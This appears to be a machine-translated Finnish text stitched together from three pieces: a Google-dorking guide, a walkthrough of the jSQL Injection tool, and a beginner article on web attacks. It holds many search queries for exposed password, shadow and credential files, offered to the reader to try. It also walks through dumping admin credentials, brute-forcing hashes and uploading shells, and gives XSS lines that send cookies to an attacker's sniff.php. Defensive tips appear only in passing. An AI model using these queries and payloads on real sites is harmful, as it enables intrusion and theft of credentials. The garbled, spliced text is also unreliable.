Inurl-operaattori: saa Googlen näyttämään kaikki sivut, jotka sisältävät määritetyn merkkijonon URL-osoitteessa. allinurl-operaattori: etsii kaikkia URL-osoitteen sanoja. Esimerkiksi:

allinurl:acid acid_stat_alerts.php

Tämä komento on erityisen hyödyllinen niille, joilla ei ole SNORTia - ainakin he näkevät kuinka se toimii todellisessa järjestelmässä.

Hakkerointimenetelmät Googlen avulla

Joten huomasimme, että käyttämällä yllä olevien operaattoreiden ja avainsanojen yhdistelmää kuka tahansa voi kerätä tarvittavat tiedot ja etsiä haavoittuvuuksia. Näitä tekniikoita kutsutaan usein nimellä Google Hacking.

Sivustokartta

Voit käyttää site:-operaattoria listataksesi kaikki linkit, jotka Google on löytänyt sivustolta. Tyypillisesti komentosarjoilla dynaamisesti luotuja sivuja ei indeksoida parametrien avulla, joten jotkut sivustot käyttävät ISAPI-suodattimia, jotta linkit eivät ole muodossa /article.asp?num=10&dst=5 vaan vinoviivalla /article/abc/num/ 10/ dst/5. Tämä tehdään siten, että hakukoneet indeksoivat sivuston yleensä.

Kokeillaan:

sivusto: www.whitehouse.gov whitehouse

Google uskoo, että verkkosivuston jokainen sivu sisältää sanan whitehouse. Tätä käytämme saadaksemme kaikki sivut.
Siitä on myös yksinkertaistettu versio:

site:whitehouse.gov

Ja parasta on, että whitehouse.gov-sivuston toverit eivät edes tienneet, että tarkastelimme heidän sivustonsa rakennetta ja jopa katsoimme välimuistissa olevia sivuja, jotka Google latasi. Tämän avulla voidaan tutkia sivustojen rakennetta ja katsella sisältöä toistaiseksi havaitsematta.

Näytä luettelo hakemistoissa olevista tiedostoista

WEB-palvelimet voivat näyttää luetteloita palvelinhakemistoista tavallisten hakemistojen sijaan HTML-sivut. Tämä tehdään yleensä käyttäjien kannustamiseksi valitsemaan ja lataamaan tiettyjä tiedostoja. Monissa tapauksissa järjestelmänvalvojilla ei kuitenkaan ole aikomusta näyttää hakemiston sisältöä. Tämä johtuu siitä väärä kokoonpano palvelin tai puute kotisivu hakemistossa. Tämän seurauksena hakkereilla on mahdollisuus löytää jotain mielenkiintoista hakemistosta ja käyttää sitä omiin tarkoituksiinsa. Kaikkien tällaisten sivujen löytämiseksi riittää, kun huomaat, että ne kaikki sisältävät sanat: index of. Mutta koska sanat hakemisto eivät sisällä vain tällaisia ​​sivuja, meidän on tarkennettava kyselyä ja otettava huomioon itse sivulla olevat avainsanat, joten kyselyt kuten:

intitle:index.of päähakemistosta
intitle:index.of name size

Koska useimmat hakemistolistaukset ovat tahallisia, sinun voi olla vaikea löytää väärässä paikassa olevia luetteloita ensimmäisellä kerralla. Mutta ainakin voit jo käyttää luetteloita määrittääksesi WEB-palvelimen version alla kuvatulla tavalla.

WEB-palvelimen version hankkiminen.

WEB-palvelimen version tunteminen on aina hyödyllistä ennen hakkerihyökkäyksen käynnistämistä. Jälleen Googlen ansiosta voit saada nämä tiedot muodostamatta yhteyttä palvelimeen. Jos katsot tarkkaan hakemistoluetteloa, voit nähdä, että WEB-palvelimen nimi ja sen versio näkyvät siellä.

Apache1.3.29 - ProXad-palvelin osoitteessa trf296.free.fr portti 80

Kokenut järjestelmänvalvoja voi muuttaa näitä tietoja, mutta yleensä se on totta. Näin ollen näiden tietojen saamiseksi riittää, että lähetät pyynnön:

intitle:index.of server.at

Tietyn palvelimen tietojen saamiseksi selvennämme pyyntöä:

intitle:index.of server.at site:ibm.com

Tai päinvastoin, etsimme palvelimia, joissa on tietty versio palvelimesta:

intitle:index.of Apache/2.0.40 Server osoitteessa

Hakkeri voi käyttää tätä tekniikkaa löytääkseen uhrin. Jos hänellä on esimerkiksi hyväksikäyttö WEB-palvelimen tietylle versiolle, hän voi löytää sen ja kokeilla olemassa olevaa hyväksikäyttöä.

Voit myös saada palvelinversion tarkastelemalla oletusarvoisesti asennettuja sivuja, kun asennat WEB-palvelimen uusimman version. Jos haluat esimerkiksi nähdä Apache 1.2.6 -testisivun, kirjoita

intitle:Test.Page.for.Apache it.worked!

Lisäksi jotkin käyttöjärjestelmät asentavat ja käynnistävät WEB-palvelimen välittömästi asennuksen aikana. Jotkut käyttäjät eivät kuitenkaan ole edes tietoisia tästä. Jos näet, että joku ei ole poistanut oletussivua, on luonnollisesti loogista olettaa, että tietokonetta ei ole mukautettu ollenkaan ja se on todennäköisesti alttiina hyökkäyksille.

Yritä etsiä IIS 5.0 -sivuja

allintitle:Tervetuloa Windows 2000 Internet Services -palveluun

IIS:n tapauksessa voit määrittää palvelimen version lisäksi myös Windows-versio ja Service Pack.

Toinen tapa määrittää WEB-palvelimen versio on etsiä oppaita (ohjesivuja) ja esimerkkejä, jotka voidaan asentaa sivustolle oletuksena. Hakkerit ovat löytäneet useita tapoja käyttää näitä komponentteja saadakseen etuoikeutetun pääsyn sivustolle. Siksi sinun on poistettava nämä komponentit tuotantopaikalla. Puhumattakaan siitä, että näiden komponenttien läsnäololla voidaan saada tietoa palvelimen tyypistä ja sen versiosta. Etsitään esimerkiksi apachen käsikirja:

inurl:manuaaliset apache-ohjemoduulit

Googlea käyttämällä kuin CGI-skanneri.

CGI-skanneri tai WEB-skanneri on apuohjelma haavoittuvien komentosarjojen ja ohjelmien etsimiseen uhrin palvelimelta. Näiden apuohjelmien on tiedettävä, mitä etsiä, koska heillä on koko luettelo haavoittuvista tiedostoista, esimerkiksi:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Löydämme kaikki nämä tiedostot Googlen avulla, lisäksi käyttämällä hakupalkissa sanoja index of tai inurl tiedostonimen kanssa: voimme löytää sivustoja, joissa on haavoittuvia komentosarjoja, esimerkiksi:

allinurl:/random_banner/index.cgi

Lisätietoa käyttämällä hakkeri voi käyttää hyväkseen komentosarjan haavoittuvuutta ja pakottaa komentosarjan lähettämään minkä tahansa palvelimelle tallennetun tiedoston. Esimerkiksi salasanatiedosto.

Kuinka suojautua Googlen hakkeroinnista. 1. Älä lähetä tärkeitä tietoja WEB-palvelimelle.

Vaikka olisit lähettänyt tiedot väliaikaisesti, saatat unohtaa ne tai joku ehtii löytää ja ottaa nämä tiedot ennen kuin poistat ne. Älä tee tätä. On monia muita tapoja siirtää tietoja, jotka suojaavat niitä varkauksilta.

2. Tarkista sivustosi.

Käytä kuvattuja menetelmiä sivustosi tutkimiseen. Tarkista sivustoltasi säännöllisesti uusia menetelmiä, jotka näkyvät sivustossa http://johnny.ihackstuff.com. Muista, että jos haluat automatisoida toimintasi, sinun on hankittava erityinen lupa Googlelta. Jos luet huolella http://www.google.com/terms_of_service.html, näet lauseen: Et saa lähettää minkäänlaisia ​​automaattisia kyselyitä Googlen järjestelmään ilman Googlen etukäteen antamaa nimenomaista lupaa.

3. Sinun ei välttämättä tarvitse Googlea indeksoida sivustoasi tai sen osaa.

Google sallii sinun poistaa linkin sivustoosi tai sen osan tietokannastaan ​​sekä sivujen poistamisen välimuistista. Lisäksi voit kieltää kuvien haun sivustoltasi, estää sivujen lyhyiden katkelmien näyttämisen hakutuloksissa Kaikki mahdollisuudet sivuston poistamiseen on kuvattu sivulla http://www.google.com/remove.html. Voit tehdä tämän vahvistamalla, että olet todella tämän sivuston omistaja, tai lisäämällä tunnisteita sivulle tai

4. Käytä robots.txt-tiedostoa

Tiedetään, että hakukoneet katsovat sivuston juuressa olevaa robots.txt-tiedostoa eivätkä indeksoi niitä osia, jotka on merkitty sanalla Disallow. Tämän avulla voit estää osan sivustosta indeksoinnin. Jos esimerkiksi haluat estää koko sivuston indeksoinnin, luo kaksi riviä sisältävä robots.txt-tiedosto:

Käyttäjä agentti: *
Estä: /

Mitä muuta tapahtuu

Jotta elämä ei tuntuisi hunajalta, sanon lopuksi, että on sivustoja, jotka valvovat niitä ihmisiä, jotka yllä kuvattujen menetelmien avulla etsivät reikiä komentosarjoista ja WEB-palvelimista. Esimerkki tällaisesta sivusta on

Sovellus.

Hieman makeaa. Kokeile itse jotain seuraavista:

1. #mysql dump filetype:sql - etsi tietokantavedoksia mySQL-tiedot
2. Isännän haavoittuvuuden yhteenvetoraportti – näyttää, mitä haavoittuvuuksia muut ihmiset ovat löytäneet
3. phpMyAdmin käynnissä osoitteessa inurl:main.php - tämä pakottaa hallinnan sulkemaan phpmyadmin-paneelin kautta
4. ei levitettävä luottamuksellisesti
5. Pyydä lisätietoja Ohjauspuun palvelinmuuttujat
6. Juokseminen lapsitilassa
7. Tämän raportin on luonut WebLog
8. intitle:index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs – ehkä joku tarvitsee palomuurin asetustiedostoja? :)
10. intitle:indeksi.talous.xls – hmm....
11. intitle: dbconvert.exe-keskustelujen hakemisto – icq-keskustelulokit
12.intext:Tobias Oetiker liikenneanalyysi
13. intitle: Webalizerin luoman käyttötilastot
14. intitle: edistyneiden verkkotilastojen tilastot
15. intitle:index.of ws_ftp.ini – ws ftp config
16. inurl:ipsec.secrets sisältää jaetut salaisuudet - salainen avain - hyvä löytö
17. inurl:main.php Tervetuloa phpMyAdminiin
18. inurl:server-info Apache-palvelimen tiedot
19. site:edu admin arvosanat
20. ORA-00921: SQL-komennon odottamaton loppu – polkujen haku
21. intitle:index.of trillian.ini
22. intitle: Index of pwd.db
23.intitle:index.of people.lst
24. intitle:index.of master.passwd
25.inurl:passlist.txt
26. intitle: .mysql_history-hakemisto
27. intitle:index of intext:globals.inc
28. intitle:index.of administrators.pwd
29. intitle: Index.of etc shadow
30.intitle:index.ofsecring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:perform filetype:ini

  • "Hakkerointi Googlelle"
  • Koulutuskeskus "Informzashchita" http://www.itsecurity.ru - johtava koulutusalan erikoiskeskus tietoturva(Moskovan koulutuskomitean lisenssi nro 015470, valtion akkreditointi nro 004251). Ainoa valtuutettu Internet Security Systemsin ja Clearswiftin koulutuskeskus Venäjällä ja IVY-maissa. Microsoftin valtuuttama koulutuskeskus (turvallisuuden erikoisala). Koulutusohjelmat koordinoidaan Venäjän valtion teknisen toimikunnan, FSB:n (FAPSI) kanssa. Koulutustodistukset ja valtion asiakirjat jatkokoulutuksesta.

    SoftKey Company on ainutlaatuinen palvelu ostajille, kehittäjille, jälleenmyyjille ja tytäryhtiökumppaneille. Lisäksi tämä on yksi parhaista online-ohjelmistokaupoista Venäjällä, Ukrainassa, Kazakstanissa, joka tarjoaa asiakkailleen laajan valikoiman tuotteita, monia maksutapoja, nopeaa (usein välitöntä) tilausten käsittelyä, tilausprosessin seurantaa henkilökohtaisessa osiossa, erilaisia alennukset myymälästä ja valmistajilta BY.

    Suorita ladattu tiedosto tuplaklikkaus(Täytyy olla virtuaalikone ).

    3. Anonymiteetti tarkistettaessa sivustoa SQL-lisäyksen varalta
    Torin ja Privoxyn määrittäminen Kali Linuxissa

    [Osio kehitteillä]

    Torin ja Privoxyn asentaminen Windowsissa

    [Osio kehitteillä]

    Välityspalvelimen asetukset jSQL Injectionissa

    [Osio kehitteillä]

    4. Tarkista sivuston SQL-injektio jSQL-injektiolla

    Työskentely ohjelman kanssa on erittäin yksinkertaista. Kirjoita vain verkkosivuston osoite ja paina ENTER.

    Seuraava kuvakaappaus osoittaa, että sivusto on alttiina kolmen tyyppisille SQL-injektioille (tiedot niistä näkyvät oikeassa alakulmassa). Napsauttamalla injektioiden nimiä voit vaihtaa käytettävää menetelmää:

    Myös olemassa olevat tietokannat on jo esitetty meille.

    Voit tarkastella kunkin taulukon sisältöä:

    Tyypillisesti mielenkiintoisin asia taulukoissa on järjestelmänvalvojan tunnistetiedot.

    Jos olet onnekas ja löydät järjestelmänvalvojan tiedot, on liian aikaista iloita. Sinun on silti löydettävä hallintapaneeli, johon nämä tiedot syötetään.

    5. Etsi hallintapaneeleita jSQL Injectionilla

    Voit tehdä tämän siirtymällä seuraavaan välilehteen. Tässä meitä tervehtii luettelo mahdollisista osoitteista. Voit valita yhden tai useamman sivun tarkistettavaksi:

    Mukavuus piilee siinä, että sinun ei tarvitse käyttää muita ohjelmia.

    Valitettavasti ei ole kovin monia huolimattomia ohjelmoijia, jotka tallentavat salasanat selkeänä tekstinä. Melko usein salasanarivillä näemme jotain tällaista

    8743b52063cd84097a65d1633f5c74f5

    Tämä on hash. Voit purkaa sen raa'alla voimalla. Ja... jSQL Injectionissa on sisäänrakennettu brute Forcer.

    6. Raaka voimahajautus jSQL-injektiolla

    Kiistaton mukavuus on, että sinun ei tarvitse etsiä muita ohjelmia. Monille suosituimmille tiivisteille on tuki.

    Tämä ei ole paras vaihtoehto. Jotta voisit tulla guruksi tiivisteiden purkamisessa, suositellaan venäjänkielistä kirjaa "".

    Mutta tietysti, kun muuta ohjelmaa ei ole käsillä tai ei ole aikaa opiskella, jSQL Injection sisäänrakennetulla brute force -toiminnolla on erittäin hyödyllinen.

    Asetuksia on olemassa: voit määrittää, mitkä merkit salasanassa on, salasanan pituusalue.

    7. Tiedostotoiminnot SQL-injektioiden havaitsemisen jälkeen

    Tietokantojen toimintojen lisäksi - niiden lukeminen ja muokkaaminen, jos SQL-injektiot havaitaan, voidaan suorittaa seuraavat tiedostotoiminnot:

    • tiedostojen lukeminen palvelimella
    • ladata uusia tiedostoja palvelimelle
    • kuorien lataaminen palvelimelle

    Ja kaikki tämä on toteutettu jSQL Injectionissa!

    On rajoituksia - SQL-palvelimella on oltava tiedostooikeudet. Ne järkevät järjestelmänvalvojat he ovat vammaisia ​​ja niihin pääsy tiedostojärjestelmä ei saa sitä.

    Tiedoston oikeuksien olemassaolo on melko helppo tarkistaa. Siirry johonkin välilehdistä (tiedostojen lukeminen, komentotulkin luominen, uuden tiedoston lataaminen) ja yritä suorittaa jokin määritetyistä toiminnoista.

    Toinen erittäin tärkeä huomautus - meidän on tiedettävä tarkka absoluuttinen polku tiedostoon, jonka kanssa työskentelemme - muuten mikään ei toimi.

    Katso seuraava kuvakaappaus:

    Kaikkiin yrityksiin käsitellä tiedostoa, meille vastataan: Ei FILE-oikeuksia (ei tiedostooikeuksia). Eikä täällä voi mitään.

    Jos sen sijaan sinulla on toinen virhe:

    Ongelma kirjoitettaessa hakemistoon [hakemiston_nimi]

    Tämä tarkoittaa, että olet määrittänyt väärin absoluuttisen polun, johon haluat kirjoittaa tiedoston.

    Jotta voit arvata absoluuttisen polun, sinun on ainakin tiedettävä käyttöjärjestelmä jolla palvelin on käynnissä. Voit tehdä tämän siirtymällä Verkko-välilehdelle.

    Tämä merkintä (Win64-rivi) antaa meille syyn olettaa, että olemme tekemisissä Windows-käyttöjärjestelmän kanssa:

    Keep-Alive: timeout=5, max=99 Palvelin: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Yhteys: Keep-Alive Menetelmä: HTTP/1.1 200 OK Sisältö-Pituus: 353 Päivämäärä: Pe, 11.12.2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Sisältötyyppi: teksti/html; charset=UTF-8

    Tässä meillä on Unix (*BSD, Linux):

    Siirtokoodaus: lohkottu Päivämäärä: pe, 11. joulukuuta 2015 11:57:02 GMT Menetelmä: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Yhteys: säilytä elossa Sisältötyyppi: text/html X- Virtalähde: PHP/5.3.29 Palvelin: Apache/2.2.31 (Unix)

    Ja tässä meillä on CentOS:

    Menetelmä: HTTP/1.1 200 OK Vanhenee: to, 19. marraskuuta 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Yhteys: säilytä elossa X-Cache-Lookup: MISS from t1.hoster.ru:6666 Palvelin: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS from t1.hoster.ru Välimuistin hallinta: ei tallentaa, ei välimuistia, täytyy vahvistaa uudelleen, post-check=0, pre-check=0 Pragma: ei välimuistia Päivämäärä: pe, 11. joulukuuta 2015 12:08:54 GMT Siirtokoodaus: lohkottu sisältötyyppi: text/html; charset=WINDOWS-1251

    Windowsissa tyypillinen sivustojen kansio on C:\Server\data\htdocs\ . Mutta itse asiassa, jos joku "ajatteli" tehdä palvelimen Windowsiin, niin todennäköisesti tämä henkilö ei ole kuullut mitään oikeuksista. Siksi sinun tulee aloittaa yrittäminen suoraan C:/Windows/-hakemistosta:

    Kuten näette, kaikki meni ensimmäisellä kerralla hyvin.

    Mutta itse jSQL Injection -kuoret herättävät epäilyksiä mielessäni. Jos sinulla on tiedostooikeudet, voit helposti ladata jotain verkkokäyttöliittymän avulla.

    8. Sivustojen joukkotarkistus SQL-injektioiden varalta

    Ja jopa tämä toiminto on saatavilla jSQL Injectionissa. Kaikki on erittäin yksinkertaista - lataa luettelo sivustoista (voit tuoda tiedostosta), valitse ne, jotka haluat tarkistaa ja napsauta asianmukaista painiketta aloittaaksesi toiminnon.

    Johtopäätös jSQL-injektiosta

    jSQL-injektio on hyvä ja tehokas työkalu verkkosivuilta löytyvien SQL-injektioiden etsimiseen ja käyttämiseen. Sen kiistattomat edut: helppokäyttöisyys, sisäänrakennetut toiminnot. jSQL Injection voi olla aloittelijan paras ystävä verkkosivustojen analysoinnissa.

    Puutteista haluaisin mainita tietokantojen muokkaamisen mahdottomuuden (en ainakaan löytänyt tätä toimintoa). Kuten kaikkien GUI-työkalujen kanssa, yksi tämän ohjelman haitoista johtuu siitä, että sitä ei voida käyttää komentosarjoissa. Siitä huolimatta tässä ohjelmassa on myös mahdollista automatisoida - sisäänrakennetun sivuston massaskannauksen ansiosta.

    JSQL Injection -ohjelma on paljon kätevämpi käyttää kuin sqlmap. Mutta sqlmap tukee lisää tyyppejä SQL-injektio, sisältää vaihtoehtoja tiedostopalomuurien ja joidenkin muiden toimintojen kanssa työskentelyyn.

    Bottom line: jSQL Injection on aloittelevan hakkerin paras ystävä.

    Ohje tälle ohjelmalle Kali Linux Encyclopediassa löytyy tältä sivulta: http://kali.tools/?p=706

    Päätin puhua hieman tietoturvasta. Artikkeli on hyödyllinen aloitteleville ohjelmoijille ja niille, jotka ovat juuri aloittaneet Frontend-kehityksen. Mikä on ongelma?

    Monet aloittelevat kehittäjät innostuvat koodin kirjoittamisesta niin, että he unohtavat kokonaan työnsä turvallisuuden. Ja mikä tärkeintä, he unohtavat sellaiset haavoittuvuudet kuin SQL- ja XXS-kyselyt. He myös keksivät helppoja salasanoja hallintopaneeleilleen ja joutuvat raa'an voiman kohteeksi. Mitä nämä hyökkäykset ovat ja miten voit välttää ne?

    SQL-injektio

    SQL-injektio on yleisin tietokantahyökkäystyyppi, joka suoritetaan tietyn DBMS-järjestelmän SQL-kyselyn aikana. Monet ihmiset ja jopa suuret yritykset kärsivät tällaisista hyökkäyksistä. Syynä on kehittäjävirhe tietokannan kirjoittamisessa ja varsinaisesti SQL-kyselyt.

    SQL-injektiohyökkäys on mahdollinen SQL-kyselyissä käytettyjen syöttötietojen virheellisen käsittelyn vuoksi. Jos hakkerin hyökkäys onnistuu, saatat menettää tietokantojen sisällön lisäksi myös salasanat ja hallintapaneelin lokit. Ja nämä tiedot riittävät ottamaan sivuston kokonaan haltuunsa tai tekemään peruuttamattomia muutoksia siihen.

    Hyökkäys voidaan toistaa onnistuneesti PHP-, ASP-, Perl- ja muilla kielillä kirjoitetuilla skripteillä. Tällaisten hyökkäysten onnistuminen riippuu enemmän siitä, mitä DBMS:ää käytetään ja miten itse komentosarja on toteutettu. Maailmassa on monia haavoittuvia sivustoja SQL-injektioille. Tämä on helppo tarkistaa. Kirjoita vain "dorks" - nämä ovat erityisiä kyselyitä haavoittuvien sivustojen etsimiseen. Tässä muutama niistä:

    • inurl:index.php?id=
    • inurl:trainers.php?id=
    • inurl:buy.php?category=
    • inurl:article.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:sivu.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:article.php?id=

    Miten niitä käytetään? Kirjoita ne vain Googlen tai Yandexin hakukoneeseen. Hakukone antaa sinulle haavoittuvan sivuston lisäksi myös sivun tästä haavoittuvuudesta. Emme kuitenkaan pysähdy tähän ja varmistamme, että sivu on todella haavoittuvainen. Tätä varten riittää, että laitat yhden lainauksen "" arvon "id=1" perään. Jotain tällaista:

    • inurl:games.php?id=1'

    Ja sivusto antaa meille virheilmoituksen SQL-kyselystä. Mitä hakkerimme tarvitsee seuraavaksi?

    Ja sitten hän tarvitsee tämän linkin virhesivulle. Sitten haavoittuvuuden parantaminen tapahtuu useimmissa tapauksissa "Kali linux" -jakelussa tämän osan apuohjelmineen: injektiokoodin käyttöönotto ja tarvittavien toimintojen suorittaminen. Miten tämä tapahtuu, en voi kertoa sinulle. Mutta voit löytää tietoa tästä Internetistä.

    XSS-hyökkäys

    Tämäntyyppinen hyökkäys suoritetaan Keksit. Käyttäjät puolestaan ​​rakastavat säästää niitä. Miksi ei? Mitä tekisimme ilman niitä? Loppujen lopuksi, evästeiden ansiosta, meidän ei tarvitse syöttää Vk.com- tai Mail.ru-salasanaa sata kertaa. Ja harvat kieltävät ne. Mutta Internetissä hakkereille ilmestyy usein sääntö: mukavuuskerroin on suoraan verrannollinen epävarmuustekijään.

    XSS-hyökkäyksen toteuttamiseksi hakkerimme tarvitsee tietoa JavaScriptistä. Ensi silmäyksellä kieli on hyvin yksinkertainen ja vaaraton, koska sillä ei ole pääsyä tietokoneresursseihin. Hakkeri voi toimia vain JavaScriptin kanssa selaimessa, mutta se riittää. Loppujen lopuksi tärkeintä on syöttää koodi verkkosivulle.

    En puhu hyökkäysprosessista yksityiskohtaisesti. Kerron vain perusteet ja merkityksen siitä, miten tämä tapahtuu.

    Hakkeri voi lisätä JS-koodin johonkin keskusteluryhmään tai vieraskirjaan:

    document.location.href =”http://192.168.1.7/sniff.php?test”

    Skriptit ohjaavat meidät tartunnan saaneelle sivulle, jossa koodi suoritetaan: olipa se sitten haistaja, jonkinlainen tallennus tai hyväksikäyttö, joka jollakin tavalla varastaa evästeemme välimuistista.

    Miksi JavaScript? Koska JavaScript käsittelee erinomaisesti verkkopyyntöjä ja sillä on pääsy evästeisiin. Mutta jos skriptimme vie meidät jollekin sivustolle, käyttäjä huomaa sen helposti. Tässä hakkeri käyttää ovelampaa vaihtoehtoa - hän yksinkertaisesti syöttää koodin kuvaan.

    Img=uusi kuva();

    Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

    Luomme yksinkertaisesti kuvan ja määritämme siihen skriptimme osoitteeksi.

    Kuinka suojautua tältä kaikelta? Se on hyvin yksinkertaista - älä napsauta epäilyttäviä linkkejä.

    DoS- ja DDos-hyökkäykset

    DoS (englanninkielisestä palvelunestokirjasta - Palvelunestohyökkäys) - hakkerin hyökkäys tietokonejärjestelmässä, jonka tarkoituksena on saada se epäonnistumaan. Tämä on sellaisten olosuhteiden luominen, joissa järjestelmän vilpittömät käyttäjät eivät voi käyttää tarjottua järjestelmäresurssit(palvelimet), tai tämä pääsy on vaikeaa. Järjestelmävika voi olla myös askel kohti sen haltuunottoa, jos ohjelmisto tuottaa hätätilanteessa kriittistä tietoa: esimerkiksi version, osan ohjelmakoodista jne. Mutta useimmiten tämä on taloudellisen paineen mitta: yksinkertaisen tuloa tuottavan palvelun menettäminen. Palveluntarjoajan laskut tai toimenpiteet hyökkäyksen välttämiseksi osuivat merkittävästi "kohteeseen" taskussa.Tällä hetkellä DoS- ja DDoS-hyökkäykset ovat suosituimpia, koska ne mahdollistavat melkein minkä tahansa järjestelmän epäonnistumisen jättämättä juridisesti merkittäviä todisteita.

    Mitä eroa on DoS- ja DDos-hyökkäyksellä?

    DoS on fiksulla tavalla suunniteltu hyökkäys. Jos palvelin ei esimerkiksi tarkista saapuvien pakettien oikeellisuutta, hakkeri voi tehdä pyynnön, jonka käsittely kestää ikuisuuden, eikä prosessoriaika riitä muiden yhteyksien työskentelyyn. Näin ollen asiakkailta evätään palvelu. Mutta suuria tunnettuja sivustoja ei voi ylikuormittaa tai poistaa käytöstä tällä tavalla. Ne on aseistettu melko laajoilla kanavilla ja supertehokkailla palvelimilla, jotka selviytyvät tällaisesta ylikuormituksesta ilman ongelmia.

    DDoS on itse asiassa sama hyökkäys kuin DoS. Mutta jos DoS:ssä on yksi pyyntöpaketti, niin DDoS:ssa niitä voi olla satoja tai enemmän. Jopa erittäin tehokkaat palvelimet eivät ehkä pysty selviytymään tällaisesta ylikuormituksesta. Annan sinulle esimerkin.

    DoS-hyökkäys on, kun keskustelet jonkun kanssa, mutta sitten joku huonotapainen henkilö tulee esiin ja alkaa huutaa kovaa. Puhuminen on joko mahdotonta tai erittäin vaikeaa. Ratkaisu: soita vartijalle, joka rauhoittuu ja poistaa henkilön tiloista. DDoS-hyökkäykset ovat, kun tuhansien tällaisten huonotapaisten ihmisten joukko ryntää sisään. Tässä tapauksessa turva ei voi sitoa kaikkia ja viedä heitä pois.

    DoS ja DDoS suoritetaan tietokoneista, niin sanotuista zombeista. Nämä ovat hakkereiden hakkeroimien käyttäjien tietokoneita, jotka eivät edes epäile, että heidän koneensa osallistuu hyökkäykseen palvelinta vastaan.

    Kuinka suojautua tältä? Yleisesti ottaen ei mitenkään. Mutta voit tehdä asioista vaikeampaa hakkerin kannalta. Tätä varten sinun on valittava hyvä isännöinti tehokkailla palvelimilla.

    Isku brutaalilla voimalla

    Kehittäjä voi keksiä monia hyökkäyssuojajärjestelmiä, tarkistaa kirjoittamamme komentosarjat, tarkistaa sivuston haavoittuvuudet jne. Mutta kun hän pääsee verkkosivuston asettelun viimeiseen vaiheeseen, eli kun hän yksinkertaisesti asettaa salasanan hallintapaneelille, hän saattaa unohtaa yhden asian. Salasana!

    Ei ole ehdottomasti suositeltavaa asettaa yksinkertaista salasanaa. Tämä voi olla 12345, 1114457, vasya111 jne. Alle 10-11 merkin pituisia salasanoja ei suositella. Muuten voit joutua yleisimmän ja mutkattoman hyökkäyksen kohteeksi - Raaka voima.

    Brute force on sanakirjasalasanahakuhyökkäys erikoisohjelmilla. Sanakirjat voivat olla erilaisia: latina, numerointi, esimerkiksi tiettyyn vaihteluväliin asti, sekoitettu (latinalainen + numerot), ja on jopa sanakirjoja, joissa on ainutlaatuisia merkkejä @#4$%&*~~`’”\ ? jne.

    Tietenkin tämäntyyppiset hyökkäykset on helppo välttää, sinun tarvitsee vain keksiä monimutkainen salasana. Jopa captcha voi pelastaa sinut. Lisäksi, jos sivustosi on tehty sisällönhallintajärjestelmässä, monet niistä havaitsevat tämäntyyppiset hyökkäykset ja estävät IP-osoitteen. Muista aina, että mitä enemmän eri merkkejä salasanassa on, sitä vaikeampi se on arvata.

    Miten hakkerit toimivat? Useimmissa tapauksissa he joko epäilevät tai tietävät osan salasanasta etukäteen. On varsin loogista olettaa, että käyttäjän salasana ei todellakaan koostu 3 tai 5 merkistä. Tällaiset salasanat johtavat usein hakkerointiin. Periaatteessa hakkerit ottavat 5–10 merkkiä ja lisäävät useita merkkejä, jotka he saattavat tietää etukäteen. Seuraavaksi luodaan salasanat vaaditulla alueella. Kali Linux -jakelussa on jopa ohjelmia tällaisiin tapauksiin. Ja voila, hyökkäys ei enää kestä kauan, koska sanakirjan määrä ei ole enää niin suuri. Lisäksi hakkeri voi käyttää näytönohjaimen tehoa. Jotkut niistä tukevat CUDA-järjestelmää, ja hakunopeus kasvaa jopa 10 kertaa. Ja nyt näemme, että hyökkäys on tällainen yksinkertaisella tavalla aivan todellista. Mutta se ei koske vain verkkosivustoja, jotka ovat raa'an voiman kohteena.

    Hyvät kehittäjät, älä koskaan unohda tietoturvajärjestelmää, koska nykyään monet ihmiset, mukaan lukien osavaltiot, kärsivät tällaisista hyökkäyksistä. Loppujen lopuksi suurin haavoittuvuus on ihminen, joka voi aina hajaantua jonnekin tai jättää jotain paitsi. Olemme ohjelmoijia, mutta emme ohjelmoituja koneita. Ole aina varuillaan, sillä tiedon menettämisellä voi olla vakavia seurauksia!